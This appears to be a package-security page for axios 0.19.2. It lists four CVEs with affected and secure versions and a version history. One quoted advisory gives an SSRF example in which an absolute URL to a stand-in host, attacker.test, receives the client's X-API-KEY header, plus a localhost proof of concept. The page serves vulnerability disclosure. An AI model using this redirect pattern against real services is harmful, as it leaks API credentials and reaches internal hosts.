NodeJS/axios/0.19.2


Promise based HTTP client for the browser and node.js

https://www.npmjs.com/package/axios
MIT

4 Security Vulnerabilities

Axios vulnerable to Server-Side Request Forgery

Published date: 2021-01-04T20:59:40Z
CVE: CVE-2020-28168
Links:

Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

axios Inefficient Regular Expression Complexity vulnerability

Published date: 2021-09-01T18:23:02Z
CVE: CVE-2021-3749
Links:

axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Published date: 2025-03-07T15:16:00Z
CVE: CVE-2025-27152
Links:

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1", "0.21.2", "0.21.3", "0.21.4", "0.22.0", "0.23.0", "0.24.0", "0.25.0", "0.26.0", "0.26.1", "0.27.0", "0.27.1", "0.27.2", "0.28.0", "0.28.1", "0.29.0", "1.0.0", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.2.0-alpha.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.8", "1.7.0-beta.0", "1.7.0-beta.1", "1.7.0-beta.2", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

Axios Cross-Site Request Forgery Vulnerability

Published date: 2023-11-08T21:30:37Z
CVE: CVE-2023-45857
Links:

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

Affected versions: ["0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1", "0.21.2", "0.21.3", "0.21.4", "0.22.0", "0.23.0", "0.24.0", "0.25.0", "0.26.0", "0.26.1", "0.27.0", "0.27.1", "0.27.2", "1.0.0", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.2.0-alpha.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.4.0", "1.5.0", "1.5.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

115 Other Versions

Version License Security Released
1.10.0 MIT 2025-06-14 - 12:11 22 days
1.9.0 MIT 2025-04-24 - 20:18 2 months
1.8.4 MIT 2025-03-19 - 19:27 4 months
1.8.3 MIT 2025-03-12 - 07:24 4 months
1.8.2 MIT 2025-03-07 - 07:41 4 months
1.8.1 MIT 1 2025-02-26 - 09:07 4 months
1.8.0 MIT 1 2025-02-26 - 06:01 4 months
1.7.9 MIT 1 2024-12-04 - 07:38 7 months
1.7.8 MIT 1 2024-11-25 - 21:13 7 months
1.7.7 MIT 1 2024-08-31 - 22:02 10 months
1.7.6 MIT 1 2024-08-30 - 19:56 10 months
1.7.5 MIT 1 2024-08-23 - 13:32 11 months
1.7.4 MIT 1 2024-08-13 - 19:33 11 months
1.7.3 MIT 2 2024-08-01 - 16:16 11 months
1.7.2 MIT 2 2024-05-21 - 16:58 about 1 year
1.7.1 MIT 2 2024-05-20 - 13:32 about 1 year
1.7.0 MIT 2 2024-05-19 - 20:25 about 1 year
1.7.0-beta.2 MIT 2 2024-05-19 - 18:01 about 1 year
1.7.0-beta.1 MIT 2 2024-05-07 - 18:37 about 1 year
1.7.0-beta.0 MIT 2 2024-04-28 - 19:50 about 1 year
1.6.8 MIT 2 2024-03-15 - 16:32 over 1 year
1.6.7 MIT 2 2024-01-25 - 19:58 over 1 year
1.6.6 MIT 2 2024-01-24 - 23:12 over 1 year
1.6.5 MIT 2 2024-01-05 - 19:52 over 1 year
1.6.4 MIT 2 2024-01-03 - 22:10 over 1 year
1.6.3 MIT 2 2023-12-26 - 23:16 over 1 year
1.6.2 MIT 2 2023-11-14 - 20:36 over 1 year
1.6.1 MIT 2 2023-11-08 - 15:09 over 1 year
1.6.0 MIT 2 2023-10-26 - 21:15 over 1 year
1.5.1 MIT 3 2023-09-26 - 18:22 almost 2 years
1.5.0 MIT 3 2023-08-26 - 19:10 almost 2 years
1.4.0 MIT 3 2023-04-27 - 23:05 about 2 years
1.3.6 MIT 3 2023-04-19 - 19:38 about 2 years
1.3.5 MIT 3 2023-04-05 - 18:03 over 2 years
1.3.4 MIT 3 2023-02-22 - 21:06 over 2 years
1.3.3 MIT 3 2023-02-13 - 18:47 over 2 years
1.3.2 MIT 3 2023-02-03 - 18:10 over 2 years
1.3.1 MIT 2 2023-02-01 - 23:31 over 2 years
1.3.0 MIT 2 2023-01-31 - 16:55 over 2 years
1.2.6 MIT 2 2023-01-28 - 16:41 over 2 years
1.2.5 MIT 2 2023-01-26 - 15:06 over 2 years
1.2.4 MIT 2 2023-01-24 - 17:21 over 2 years
1.2.3 MIT 2 2023-01-17 - 17:56 over 2 years
1.2.2 MIT 2 2022-12-29 - 06:38 over 2 years
1.2.1 MIT 2 2022-12-05 - 19:39 over 2 years
1.2.0 MIT 2 2022-11-22 - 19:06 over 2 years
1.2.0-alpha.1 MIT 2 2022-11-10 - 19:06 over 2 years
1.1.3 MIT 2 2022-10-15 - 13:42 over 2 years
1.1.2 MIT 2 2022-10-07 - 10:14 over 2 years
1.1.1 MIT 2 2022-10-07 - 09:15 over 2 years